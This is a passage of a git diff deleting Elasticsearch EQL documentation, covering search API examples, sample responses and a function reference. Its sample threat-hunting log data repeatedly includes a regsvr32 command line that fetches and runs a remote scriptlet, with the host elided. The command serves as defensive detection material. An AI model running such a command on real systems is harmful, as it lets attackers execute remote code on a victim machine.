- -[source,console-result] ----- -{ - "is_partial": false, - "is_running": false, - "took": 6, - "timed_out": false, - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "sequences": [ - { - "join_keys": [ - 2012 - ], - "events": [ - { - "_index": "my-index-000001", - "_id": "AtOJ4UjUBAAx3XR5kcCM", - "_source": { - "@timestamp": "2099-12-06T11:04:07.000Z", - "event": { - "category": "file", - "id": "dGCHwoeS", - "sequence": 2 - }, - "file": { - "accessed": "2099-12-07T11:07:08.000Z", - "name": "cmd.exe", - "path": "C:\\Windows\\System32\\cmd.exe", - "type": "file", - "size": 16384 - }, - "process": { - "pid": 2012, - "name": "cmd.exe", - "executable": "C:\\Windows\\System32\\cmd.exe" - } - } - }, - { - "_index": "my-index-000001", - "_id": "OQmfCaduce8zoHT93o4H", - "_source": { - "@timestamp": "2099-12-07T11:07:09.000Z", - "event": { - "category": "process", - "id": "aR3NWVOs", - "sequence": 4 - }, - "process": { - "pid": 2012, - "name": "regsvr32.exe", - "command_line": "regsvr32.exe /s /u /i:https://...RegSvr32.sct scrobj.dll", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - } - } - } - ] - } - ] - } -} ----- -// TESTRESPONSE[s/"took": 6/"took": $body.took/] -// TESTRESPONSE[s/"_id": "AtOJ4UjUBAAx3XR5kcCM"/"_id": $body.hits.sequences.0.events.0._id/] -// TESTRESPONSE[s/"_id": "OQmfCaduce8zoHT93o4H"/"_id": $body.hits.sequences.0.events.1._id/] diff --git a/docs/reference/eql/eql.asciidoc b/docs/reference/eql/eql.asciidoc deleted file mode 100644 index 6cbdf2975dc..00000000000 --- a/docs/reference/eql/eql.asciidoc +++ /dev/null @@ -1,621 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[eql]] -= EQL search -++++ -EQL -++++ - -beta::[] - -Event Query Language (EQL) is a query language for event-based time series -data, such as logs, metrics, and traces. - -[discrete] -[[eql-advantages]] -== Advantages of EQL - -* *EQL lets you express relationships between events.* + -Many query languages allow you to match single events. EQL lets you match a -sequence of events across different event categories and time spans. - -* *EQL has a low learning curve.* + -<> looks like other common query languages, such as SQL. -EQL lets you write and read queries intuitively, which makes for quick, -iterative searching. - -* *EQL is designed for security use cases.* + -While you can use it for any event-based data, we created EQL for threat -hunting. EQL not only supports indicator of compromise (IOC) searches but can -describe activity that goes beyond IOCs. - -[discrete] -[[eql-required-fields]] -== Required fields - -To run an EQL search, the searched data stream or index must contain a -_timestamp_ and _event category_ field. By default, EQL uses the `@timestamp` -and `event.category` fields from the {ecs-ref}[Elastic Common Schema -(ECS)]. To use a different timestamp or event category field, see -<>. - -TIP: While no schema is required to use EQL, we recommend using the -{ecs-ref}[ECS]. EQL searches are designed to work with core ECS fields by -default. - -[discrete] -[[run-an-eql-search]] -== Run an EQL search - -Use the <> to run a <>: - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - process where process.name == "regsvr32.exe" - """ -} ----- -// TEST[setup:sec_logs] - -By default, basic EQL queries return the top 10 matching events in the -`hits.events` property. These hits are sorted by timestamp, converted to -milliseconds since the {wikipedia}/Unix_time[Unix epoch], in ascending order. 
- -[source,console-result] ----- -{ - "is_partial": false, - "is_running": false, - "took": 60, - "timed_out": false, - "hits": { - "total": { - "value": 2, - "relation": "eq" - }, - "events": [ - { - "_index": "my-index-000001", - "_id": "OQmfCaduce8zoHT93o4H", - "_source": { - "@timestamp": "2099-12-07T11:07:09.000Z", - "event": { - "category": "process", - "id": "aR3NWVOs", - "sequence": 4 - }, - "process": { - "pid": 2012, - "name": "regsvr32.exe", - "command_line": "regsvr32.exe /s /u /i:https://...RegSvr32.sct scrobj.dll", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - } - } - }, - { - "_index": "my-index-000001", - "_id": "xLkCaj4EujzdNSxfYLbO", - "_source": { - "@timestamp": "2099-12-07T11:07:10.000Z", - "event": { - "category": "process", - "id": "GTSmSqgz0U", - "sequence": 6, - "type": "termination" - }, - "process": { - "pid": 2012, - "name": "regsvr32.exe", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - } - } - } - ] - } -} ----- -// TESTRESPONSE[s/"took": 60/"took": $body.took/] -// TESTRESPONSE[s/"_id": "OQmfCaduce8zoHT93o4H"/"_id": $body.hits.events.0._id/] -// TESTRESPONSE[s/"_id": "xLkCaj4EujzdNSxfYLbO"/"_id": $body.hits.events.1._id/] - -Use the `size` parameter to get a smaller or larger set of hits: - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - process where process.name == "regsvr32.exe" - """, - "size": 50 -} ----- -// TEST[setup:sec_logs] - -[discrete] -[[eql-search-sequence]] -=== Search for a sequence of events - -Use EQL's <> to search for a series of -ordered events. List the event items in ascending chronological order, -with the most recent event listed last: - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - sequence - [ process where process.name == "regsvr32.exe" ] - [ file where stringContains(file.name, "scrobj.dll") ] - """ -} ----- -// TEST[setup:sec_logs] - -Matching sequences are returned in the `hits.sequences` property. 
- -[source,console-result] ----- -{ - "is_partial": false, - "is_running": false, - "took": 60, - "timed_out": false, - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "sequences": [ - { - "events": [ - { - "_index": "my-index-000001", - "_id": "OQmfCaduce8zoHT93o4H", - "_source": { - "@timestamp": "2099-12-07T11:07:09.000Z", - "event": { - "category": "process", - "id": "aR3NWVOs", - "sequence": 4 - }, - "process": { - "pid": 2012, - "name": "regsvr32.exe", - "command_line": "regsvr32.exe /s /u /i:https://...RegSvr32.sct scrobj.dll", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - } - } - }, - { - "_index": "my-index-000001", - "_id": "yDwnGIJouOYGBzP0ZE9n", - "_source": { - "@timestamp": "2099-12-07T11:07:10.000Z", - "event": { - "category": "file", - "id": "tZ1NWVOs", - "sequence": 5 - }, - "process": { - "pid": 2012, - "name": "regsvr32.exe", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - }, - "file": { - "path": "C:\\Windows\\System32\\scrobj.dll", - "name": "scrobj.dll" - } - } - } - ] - } - ] - } -} ----- -// TESTRESPONSE[s/"took": 60/"took": $body.took/] -// TESTRESPONSE[s/"_id": "OQmfCaduce8zoHT93o4H"/"_id": $body.hits.sequences.0.events.0._id/] -// TESTRESPONSE[s/"_id": "yDwnGIJouOYGBzP0ZE9n"/"_id": $body.hits.sequences.0.events.1._id/] - -Use the <> to constrain -matching sequences to a timespan: - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - sequence with maxspan=1h - [ process where process.name == "regsvr32.exe" ] - [ file where stringContains(file.name, "scrobj.dll") ] - """ -} ----- -// TEST[setup:sec_logs] - -Use the <> to match events that share the -same field values: - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - sequence with maxspan=1h - [ process where process.name == "regsvr32.exe" ] by process.pid - [ file where stringContains(file.name, "scrobj.dll") ] by process.pid - """ -} ----- -// TEST[setup:sec_logs] - -If a field value should be shared across all events, use the `sequence by` -keyword. The following query is equivalent to the previous one. - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - sequence by process.pid with maxspan=1h - [ process where process.name == "regsvr32.exe" ] - [ file where stringContains(file.name, "scrobj.dll") ] - """ -} ----- -// TEST[setup:sec_logs] - -The `hits.sequences.join_keys` property contains the shared field values. 
- -[source,console-result] ----- -{ - "is_partial": false, - "is_running": false, - "took": 60, - "timed_out": false, - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "sequences": [ - { - "join_keys": [ - 2012 - ], - "events": [ - { - "_index": "my-index-000001", - "_id": "OQmfCaduce8zoHT93o4H", - "_source": { - "@timestamp": "2099-12-07T11:07:09.000Z", - "event": { - "category": "process", - "id": "aR3NWVOs", - "sequence": 4 - }, - "process": { - "pid": 2012, - "name": "regsvr32.exe", - "command_line": "regsvr32.exe /s /u /i:https://...RegSvr32.sct scrobj.dll", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - } - } - }, - { - "_index": "my-index-000001", - "_id": "yDwnGIJouOYGBzP0ZE9n", - "_source": { - "@timestamp": "2099-12-07T11:07:10.000Z", - "event": { - "category": "file", - "id": "tZ1NWVOs", - "sequence": 5 - }, - "process": { - "pid": 2012, - "name": "regsvr32.exe", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - }, - "file": { - "path": "C:\\Windows\\System32\\scrobj.dll", - "name": "scrobj.dll" - } - } - } - ] - } - ] - } -} ----- -// TESTRESPONSE[s/"took": 60/"took": $body.took/] -// TESTRESPONSE[s/"_id": "OQmfCaduce8zoHT93o4H"/"_id": $body.hits.sequences.0.events.0._id/] -// TESTRESPONSE[s/"_id": "yDwnGIJouOYGBzP0ZE9n"/"_id": $body.hits.sequences.0.events.1._id/] - -Use the <> to specify an expiration -event for sequences. Matching sequences must end before this event. - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - sequence by process.pid with maxspan=1h - [ process where process.name == "regsvr32.exe" ] - [ file where stringContains(file.name, "scrobj.dll") ] - until [ process where event.type == "termination" ] - """ -} ----- -// TEST[setup:sec_logs] - -[discrete] -[[specify-a-timestamp-or-event-category-field]] -=== Specify a timestamp or event category field - -The EQL search API uses the `@timestamp` and `event.category` fields from the -{ecs-ref}[ECS] by default. To specify different fields, use the -`timestamp_field` and `event_category_field` parameters: - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "timestamp_field": "file.accessed", - "event_category_field": "file.type", - "query": """ - file where (file.size > 1 and file.type == "file") - """ -} ----- -// TEST[setup:sec_logs] - -The event category field must be mapped as a <> family field -type. The timestamp field should be mapped as a <> field type. -<> timestamp fields are not supported. You cannot use a -<> field or the sub-fields of a `nested` field as the timestamp -or event category field. - -[discrete] -[[eql-search-specify-a-sort-tiebreaker]] -=== Specify a sort tiebreaker - -By default, the EQL search API returns matching hits by timestamp. If two or -more events share the same timestamp, {es} uses a tiebreaker field value to sort -the events in ascending order. {es} orders events with no -tiebreaker value after events with a value. - -If you don't specify a tiebreaker field or the events also share the same -tiebreaker value, {es} considers the events concurrent. Concurrent events cannot -be part of the same sequence and may not be returned in a consistent sort order. - -To specify a tiebreaker field, use the `tiebreaker_field` parameter. If you use -the {ecs-ref}[ECS], we recommend using `event.sequence` as the tiebreaker field. 
- -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "tiebreaker_field": "event.sequence", - "query": """ - process where process.name == "cmd.exe" and stringContains(process.executable, "System32") - """ -} ----- -// TEST[setup:sec_logs] - -[discrete] -[[eql-search-filter-query-dsl]] -=== Filter using query DSL - -The `filter` parameter uses <> to limit the documents on -which an EQL query runs. - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "filter": { - "range" : { - "file.size" : { - "gte" : 1, - "lte" : 1000000 - } - } - }, - "query": """ - file where (file.type == "file" and file.name == "cmd.exe") - """ -} ----- -// TEST[setup:sec_logs] - -[discrete] -[[eql-search-async]] -=== Run an async EQL search - -By default, EQL search requests are synchronous and wait for complete results -before returning a response. However, complete results can take longer for -searches across <> or -<>. - -To avoid long waits, run an async EQL search. Set the -`wait_for_completion_timeout` parameter to a duration you'd like to wait for -synchronous results. - -[source,console] ----- -GET /frozen-my-index-000001/_eql/search -{ - "wait_for_completion_timeout": "2s", - "query": """ - process where process.name == "cmd.exe" - """ -} ----- -// TEST[setup:sec_logs] -// TEST[s/frozen-my-index-000001/my-index-000001/] - -If the request doesn't finish within the timeout period, the search becomes async -and returns a response that includes: - -* A search ID -* An `is_partial` value of `true`, indicating the search results are - incomplete -* An `is_running` value of `true`, indicating the search is ongoing - -The async search continues to run in the background without blocking other -requests. - -[source,console-result] ----- -{ - "id": "FmNJRUZ1YWZCU3dHY1BIOUhaenVSRkEaaXFlZ3h4c1RTWFNocDdnY2FSaERnUTozNDE=", - "is_partial": true, - "is_running": true, - "took": 2000, - "timed_out": false, - "hits": ... -} ----- -// TESTRESPONSE[s/FmNJRUZ1YWZCU3dHY1BIOUhaenVSRkEaaXFlZ3h4c1RTWFNocDdnY2FSaERnUTozNDE=/$body.id/] -// TESTRESPONSE[s/"is_partial": true/"is_partial": $body.is_partial/] -// TESTRESPONSE[s/"is_running": true/"is_running": $body.is_running/] -// TESTRESPONSE[s/"took": 2000/"took": $body.took/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -To check the progress of an async search, use the <> with the search ID. Specify how long you'd like for -complete results in the `wait_for_completion_timeout` parameter. - -[source,console] ----- -GET /_eql/search/FmNJRUZ1YWZCU3dHY1BIOUhaenVSRkEaaXFlZ3h4c1RTWFNocDdnY2FSaERnUTozNDE=?wait_for_completion_timeout=2s ----- -// TEST[skip: no access to search ID] - -If the response's `is_running` value is `false`, the async search has finished. -If the `is_partial` value is `false`, the returned search results are -complete. - -[source,console-result] ----- -{ - "id": "FmNJRUZ1YWZCU3dHY1BIOUhaenVSRkEaaXFlZ3h4c1RTWFNocDdnY2FSaERnUTozNDE=", - "is_partial": false, - "is_running": false, - "took": 2000, - "timed_out": false, - "hits": ... -} ----- -// TESTRESPONSE[s/FmNJRUZ1YWZCU3dHY1BIOUhaenVSRkEaaXFlZ3h4c1RTWFNocDdnY2FSaERnUTozNDE=/$body.id/] -// TESTRESPONSE[s/"took": 2000/"took": $body.took/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -[discrete] -[[eql-search-store-async-eql-search]] -=== Change the search retention period - -By default, the EQL search API stores async searches for five days. After this -period, any searches and their results are deleted. 
Use the `keep_alive` -parameter to change this retention period: - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "keep_alive": "2d", - "wait_for_completion_timeout": "2s", - "query": """ - process where process.name == "cmd.exe" - """ -} ----- -// TEST[setup:sec_logs] - -You can use the <>'s -`keep_alive` parameter to later change the retention period. The new retention -period starts after the get request runs. - -[source,console] ----- -GET /_eql/search/FmNJRUZ1YWZCU3dHY1BIOUhaenVSRkEaaXFlZ3h4c1RTWFNocDdnY2FSaERnUTozNDE=?keep_alive=5d ----- -// TEST[skip: no access to search ID] - -Use the <> to -manually delete an async EQL search before the `keep_alive` period ends. If the -search is still ongoing, {es} cancels the search request. - -[source,console] ----- -DELETE /_eql/search/FmNJRUZ1YWZCU3dHY1BIOUhaenVSRkEaaXFlZ3h4c1RTWFNocDdnY2FSaERnUTozNDE=?keep_alive=5d ----- -// TEST[skip: no access to search ID] - -[discrete] -[[eql-search-store-sync-eql-search]] -=== Store synchronous EQL searches - -By default, the EQL search API only stores async searches. To save a synchronous -search, set `keep_on_completion` to `true`: - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "keep_on_completion": true, - "wait_for_completion_timeout": "2s", - "query": """ - process where process.name == "cmd.exe" - """ -} ----- -// TEST[setup:sec_logs] - -The response includes a search ID. `is_partial` and `is_running` are `false`, -indicating the EQL search was synchronous and returned complete results. - -[source,console-result] ----- -{ - "id": "FjlmbndxNmJjU0RPdExBTGg0elNOOEEaQk9xSjJBQzBRMldZa1VVQ2pPa01YUToxMDY=", - "is_partial": false, - "is_running": false, - "took": 52, - "timed_out": false, - "hits": ... -} ----- -// TESTRESPONSE[s/FjlmbndxNmJjU0RPdExBTGg0elNOOEEaQk9xSjJBQzBRMldZa1VVQ2pPa01YUToxMDY=/$body.id/] -// TESTRESPONSE[s/"took": 52/"took": $body.took/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -Use the <> to get the -same results later: - -[source,console] ----- -GET /_eql/search/FjlmbndxNmJjU0RPdExBTGg0elNOOEEaQk9xSjJBQzBRMldZa1VVQ2pPa01YUToxMDY= ----- -// TEST[skip: no access to search ID] - -Saved synchronous searches are still subject to the `keep_alive` parameter's -retention period. When this period ends, the search and its results are deleted. - -You can also manually delete saved synchronous searches using the -<>. - -include::syntax.asciidoc[] -include::functions.asciidoc[] -include::pipes.asciidoc[] -include::detect-threats-with-eql.asciidoc[] diff --git a/docs/reference/eql/functions.asciidoc b/docs/reference/eql/functions.asciidoc deleted file mode 100644 index 8d0f1a6da36..00000000000 --- a/docs/reference/eql/functions.asciidoc +++ /dev/null @@ -1,1063 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[eql-function-ref]] -== EQL function reference -++++ -Function reference -++++ - -beta::[] - -{es} supports the following <>. Most EQL functions -are case-sensitive by default. - -[discrete] -[[eql-fn-add]] -=== `add` -Returns the sum of two provided addends. - -*Example* -[source,eql] ----- -add(4, 5) // returns 9 -add(4, 0.5) // returns 4.5 -add(0.5, 0.25) // returns 0.75 -add(4, -2) // returns 2 -add(-2, -2) // returns -4 - -// process.args_count = 4 -add(process.args_count, 5) // returns 9 -add(process.args_count, 0.5) // returns 4.5 - -// process.parent.args_count = 2 -add(process.args_count, process.parent.args_count) // returns 6 - -// null handling -add(null, 4) // returns null -add(4. 
null) // returns null -add(null, process.args_count) // returns null -add(process.args_count null) // returns null ----- - -*Syntax* -[source,txt] ----- -add(, ) ----- - -*Parameters:* - -``:: -(Required, integer or float or `null`) -Addend to add. If `null`, the function returns `null`. -+ -Two addends are required. No more than two addends can be provided. -+ -If using a field as the argument, this parameter supports only -<> field data types. - -*Returns:* integer, float, or `null` - -[discrete] -[[eql-fn-between]] -=== `between` - -Extracts a substring that's between a provided `left` and `right` text in a -source string. Matching is case-sensitive. - -*Example* -[source,eql] ----- -// file.path = "C:\\Windows\\System32\\cmd.exe" -between(file.path, "system32\\\\", ".exe") // returns "cmd" -between(file.path, "workspace\\\\", ".exe") // returns "" - -// Greedy matching defaults to false. -between(file.path, "\\\\", "\\\\", false) // returns "Windows" - -// Sets greedy matching to true -between(file.path, "\\\\", "\\\\", true) // returns "Windows\\System32" - -// empty source string -between("", "system32\\\\", ".exe") // returns "" -between("", "", "") // returns "" - -// null handling -between(null, "system32\\\\", ".exe") // returns null ----- - -*Syntax* -[source,txt] ----- -between(, , [, ]) ----- - -*Parameters* - -``:: -+ --- -(Required, string or `null`) -Source string. Empty strings return an empty string (`""`), regardless of the -`` or `` parameters. If `null`, the function returns `null`. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field --- - -``:: -+ --- -(Required, string) -Text to the left of the substring to extract. This text should include -whitespace. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field --- - -``:: -+ --- -(Required, string) -Text to the right of the substring to extract. This text should include -whitespace. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field --- - -``:: -(Optional, Boolean) -If `true`, match the longest possible substring, similar to `.*` in regular -expressions. If `false`, match the shortest possible substring, similar to `.*?` -in regular expressions. Defaults to `false`. - -*Returns:* string or `null` - -[discrete] -[[eql-fn-cidrmatch]] -=== `cidrMatch` - -Returns `true` if an IP address is contained in one or more provided -{wikipedia}/Classless_Inter-Domain_Routing[CIDR] blocks. - -*Example* - -[source,eql] ----- -// source.address = "192.168.152.12" -cidrMatch(source.address, "192.168.0.0/16") // returns true -cidrMatch(source.address, "192.168.0.0/16", "10.0.0.0/8") // returns true -cidrMatch(source.address, "10.0.0.0/8") // returns false -cidrMatch(source.address, "10.0.0.0/8", "10.128.0.0/9") // returns false - -// null handling -cidrMatch(null, "10.0.0.0/8") // returns null -cidrMatch(source.address, null) // returns null ----- - -*Syntax* -[source,txt] ----- -`cidrMatch(, [, ...])` ----- - -*Parameters* - -``:: -(Required, string or `null`) -IP address. Supports -{wikipedia}/IPv4[IPv4] and -{wikipedia}/IPv6[IPv6] addresses. If `null`, the function -returns `null`. -+ -If using a field as the argument, this parameter supports only the <> -field data type. 
- -``:: -(Required{multi-arg}, string or `null`) -CIDR block you wish to search. If `null`, the function returns `null`. - -*Returns:* boolean or `null` - -[discrete] -[[eql-fn-concat]] -=== `concat` - -Returns a concatenated string of provided values. - -*Example* -[source,eql] ----- -concat("process is ", "regsvr32.exe") // returns "process is regsvr32.exe" -concat("regsvr32.exe", " ", 42) // returns "regsvr32.exe 42" -concat("regsvr32.exe", " ", 42.5) // returns "regsvr32.exe 42.5" -concat("regsvr32.exe", " ", true) // returns "regsvr32.exe true" -concat("regsvr32.exe") // returns "regsvr32.exe" - -// process.name = "regsvr32.exe" -concat(process.name, " ", 42) // returns "regsvr32.exe 42" -concat(process.name, " ", 42.5) // returns "regsvr32.exe 42.5" -concat("process is ", process.name) // returns "process is regsvr32.exe" -concat(process.name, " ", true) // returns "regsvr32.exe true" -concat(process.name) // returns "regsvr32.exe" - -// process.arg_count = 4 -concat(process.name, " ", process.arg_count) // returns "regsvr32.exe 4" - -// null handling -concat(null, "regsvr32.exe") // returns null -concat(process.name, null) // returns null -concat(null) // returns null ----- - -*Syntax* -[source,txt] ----- -concat([, ]) ----- - -*Parameters* - -``:: -(Required{multi-arg-ref}) -Value to concatenate. If any of the arguments are `null`, the function returns `null`. -+ -If using a field as the argument, this parameter does not support the -<> field data type. - -*Returns:* string or `null` - -[discrete] -[[eql-fn-divide]] -=== `divide` -Returns the quotient of a provided dividend and divisor. - -[[eql-divide-fn-float-rounding]] -[WARNING] -==== -If both the dividend and divisor are integers, the `divide` function _rounds -down_ any returned floating point numbers to the nearest integer. To avoid -rounding, convert either the dividend or divisor to a float. - -[%collapsible] -.**Example** -===== -The `process.args_count` field is a <> integer field containing a -count of process arguments. - -A user might expect the following EQL query to only match events with a -`process.args_count` value of `4`. - -[source,eql] ----- -process where divide(4, process.args_count) == 1 ----- - -However, the EQL query matches events with a `process.args_count` value of `3` -or `4`. - -For events with a `process.args_count` value of `3`, the `divide` function -returns a floating point number of `1.333...`, which is rounded down to `1`. - -To match only events with a `process.args_count` value of `4`, convert -either the dividend or divisor to a float. - -The following EQL query changes the integer `4` to the equivalent float `4.0`. - -[source,eql] ----- -process where divide(4.0, process.args_count) == 1 ----- -===== -==== - -*Example* -[source,eql] ----- -divide(4, 2) // returns 2 -divide(4, 3) // returns 1 -divide(4, 3.0) // returns 1.333... -divide(4, 0.5) // returns 8 -divide(0.5, 4) // returns 0.125 -divide(0.5, 0.25) // returns 2.0 -divide(4, -2) // returns -2 -divide(-4, -2) // returns 2 - -// process.args_count = 4 -divide(process.args_count, 2) // returns 2 -divide(process.args_count, 3) // returns 1 -divide(process.args_count, 3.0) // returns 1.333... 
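-// illustrative additions: with two integer arguments, quotients below
-// one also round down to 0
-divide(process.args_count, 8) // returns 0
-divide(process.args_count, 8.0) // returns 0.5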
-divide(12, process.args_count) // returns 3 -divide(process.args_count, 0.5) // returns 8 -divide(0.5, process.args_count) // returns 0.125 - -// process.parent.args_count = 2 -divide(process.args_count, process.parent.args_count) // returns 2 - -// null handling -divide(null, 4) // returns null -divide(4, null) // returns null -divide(null, process.args_count) // returns null -divide(process.args_count, null) // returns null ----- - -*Syntax* -[source,txt] ----- -divide(, ) ----- - -*Parameters* - -``:: -(Required, integer or float or `null`) -Dividend to divide. If `null`, the function returns `null`. -+ -If using a field as the argument, this parameter supports only -<> field data types. - -``:: -(Required, integer or float or `null`) -Divisor to divide by. If `null`, the function returns `null`. This value cannot -be zero (`0`). -+ -If using a field as the argument, this parameter supports only -<> field data types. - -*Returns:* integer, float, or null - -[discrete] -[[eql-fn-endswith]] -=== `endsWith` - -Returns `true` if a source string ends with a provided substring. Matching is -case-sensitive. - -*Example* -[source,eql] ----- -endsWith("regsvr32.exe", ".exe") // returns true -endsWith("regsvr32.exe", ".dll") // returns false -endsWith("", "") // returns true - -// file.name = "regsvr32.exe" -endsWith(file.name, ".exe") // returns true -endsWith(file.name, ".dll") // returns false - -// file.extension = ".exe" -endsWith("regsvr32.exe", file.extension) // returns true -endsWith("ntdll.dll", file.name) // returns false - -// null handling -endsWith("regsvr32.exe", null) // returns null -endsWith("", null) // returns null -endsWith(null, ".exe") // returns null -endsWith(null, null) // returns null ----- - -*Syntax* -[source,txt] ----- -endsWith(, ) ----- - -*Parameters* - -``:: -+ --- -(Required, string or `null`) -Source string. If `null`, the function returns `null`. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field --- - -``:: -+ --- -(Required, string or `null`) -Substring to search for. If `null`, the function returns `null`. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field --- - -*Returns:* boolean or `null` - -[discrete] -[[eql-fn-indexof]] -=== `indexOf` - -Returns the first position of a provided substring in a source string. Matching -is case-sensitive. - -If an optional start position is provided, this function returns the first -occurrence of the substring at or after the start position. 
- -*Example* -[source,eql] ----- -// url.domain = "subdomain.example.com" -indexOf(url.domain, ".") // returns 9 -indexOf(url.domain, ".", 9) // returns 9 -indexOf(url.domain, ".", 10) // returns 17 -indexOf(url.domain, ".", -6) // returns 9 - -// empty strings -indexOf("", "") // returns 0 -indexOf(url.domain, "") // returns 0 -indexOf(url.domain, "", 9) // returns 9 -indexOf(url.domain, "", 10) // returns 10 -indexOf(url.domain, "", -6) // returns 0 - -// missing substrings -indexOf(url.domain, "z") // returns null -indexOf(url.domain, "z", 9) // returns null - -// start position is higher than string length -indexOf(url.domain, ".", 30) // returns null - -// null handling -indexOf(null, ".", 9) // returns null -indexOf(url.domain, null, 9) // returns null -indexOf(url.domain, ".", null) // returns null ----- - -*Syntax* -[source,txt] ----- -indexOf(, [, ]) ----- - -*Parameters* - -``:: -+ --- -(Required, string or `null`) -Source string. If `null`, the function returns `null`. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field --- - -``:: -+ --- -(Required, string or `null`) -Substring to search for. - -If this argument is `null` or the `` string does not contain this -substring, the function returns `null`. - -If the `` is positive, empty strings (`""`) return the ``. -Otherwise, empty strings return `0`. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field --- - -``:: -+ --- -(Optional, integer or `null`) -Starting position for matching. The function will not return positions before -this one. Defaults to `0`. - -Positions are zero-indexed. Negative offsets are treated as `0`. - -If this argument is `null` or higher than the length of the `` string, -the function returns `null`. - -If using a field as the argument, this parameter supports only the following -<> field data types: - -* `long` -* `integer` -* `short` -* `byte` --- - -*Returns:* integer or `null` - -[discrete] -[[eql-fn-length]] -=== `length` - -Returns the character length of a provided string, including whitespace and -punctuation. - -*Example* -[source,eql] ----- -length("explorer.exe") // returns 12 -length("start explorer.exe") // returns 18 -length("") // returns 0 -length(null) // returns null - -// process.name = "regsvr32.exe" -length(process.name) // returns 12 ----- - -*Syntax* -[source,txt] ----- -length() ----- - -*Parameters* - -``:: -+ --- -(Required, string or `null`) -String for which to return the character length. If `null`, the function returns -`null`. Empty strings return `0`. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field --- - -*Returns:* integer or `null` - -[discrete] -[[eql-fn-modulo]] -=== `modulo` -Returns the remainder of the division of a provided dividend and divisor. 
-
-*Example*
-[source,eql]
-----
-modulo(10, 6) // returns 4
-modulo(10, 5) // returns 0
-modulo(10, 0.5) // returns 0
-modulo(10, -6) // returns 4
-modulo(-10, -6) // returns -4
-
-// process.args_count = 10
-modulo(process.args_count, 6) // returns 4
-modulo(process.args_count, 5) // returns 0
-modulo(106, process.args_count) // returns 6
-modulo(process.args_count, -6) // returns 4
-modulo(process.args_count, 0.5) // returns 0
-
-// process.parent.args_count = 6
-modulo(process.args_count, process.parent.args_count) // returns 4
-
-// null handling
-modulo(null, 5) // returns null
-modulo(7, null) // returns null
-modulo(null, process.args_count) // returns null
-modulo(process.args_count, null) // returns null
-----
-
-*Syntax*
-[source,txt]
-----
-modulo(, )
-----
-
-*Parameters*
-
-``::
-(Required, integer or float or `null`)
-Dividend to divide. If `null`, the function returns `null`. Floating point
-numbers return `0`.
-+
-If using a field as the argument, this parameter supports only
-<> field data types.
-
-``::
-(Required, integer or float or `null`)
-Divisor to divide by. If `null`, the function returns `null`. Floating point
-numbers return `0`. This value cannot be zero (`0`).
-+
-If using a field as the argument, this parameter supports only
-<> field data types.
-
-*Returns:* integer, float, or `null`
-
-[discrete]
-[[eql-fn-multiply]]
-=== `multiply`
-
-Returns the product of two provided factors.
-
-*Example*
-[source,eql]
-----
-multiply(2, 2) // returns 4
-multiply(0.5, 2) // returns 1
-multiply(0.25, 2) // returns 0.5
-multiply(-2, 2) // returns -4
-multiply(-2, -2) // returns 4
-
-// process.args_count = 2
-multiply(process.args_count, 2) // returns 4
-multiply(0.5, process.args_count) // returns 1
-multiply(0.25, process.args_count) // returns 0.5
-
-// process.parent.args_count = 3
-multiply(process.args_count, process.parent.args_count) // returns 6
-
-// null handling
-multiply(null, 2) // returns null
-multiply(2, null) // returns null
-----
-
-*Syntax*
-[source,txt]
-----
-multiply()
-----
-
-*Parameters*
-
-``::
-+
---
-(Required, integer or float or `null`)
-Factor to multiply. If `null`, the function returns `null`.
-
-Two factors are required. No more than two factors can be provided.
-
-If using a field as the argument, this parameter supports only
-<> field data types.
---
-
-*Returns:* integer, float, or `null`
-
-[discrete]
-[[eql-fn-number]]
-=== `number`
-
-Converts a string to the corresponding integer or float.
-
-*Example*
-[source,eql]
-----
-number("1337") // returns 1337
-number("42.5") // returns 42.5
-number("deadbeef", 16) // returns 3735928559
-
-// integer literals beginning with "0x" are auto-detected as hexadecimal
-number("0xdeadbeef") // returns 3735928559
-number("0xdeadbeef", 16) // returns 3735928559
-
-// "+" and "-" are supported
-number("+1337") // returns 1337
-number("-1337") // returns -1337
-
-// surrounding whitespace is ignored
-number(" 1337 ") // returns 1337
-
-// process.pid = "1337"
-number(process.pid) // returns 1337
-
-// null handling
-number(null) // returns null
-number(null, 16) // returns null
-
-// strings beginning with "0x" are treated as hexadecimal (base 16),
-// even if the is explicitly null.
-number("0xdeadbeef", null) // returns 3735928559
-
-// otherwise, strings are treated as decimal (base 10)
-// if the is explicitly null.
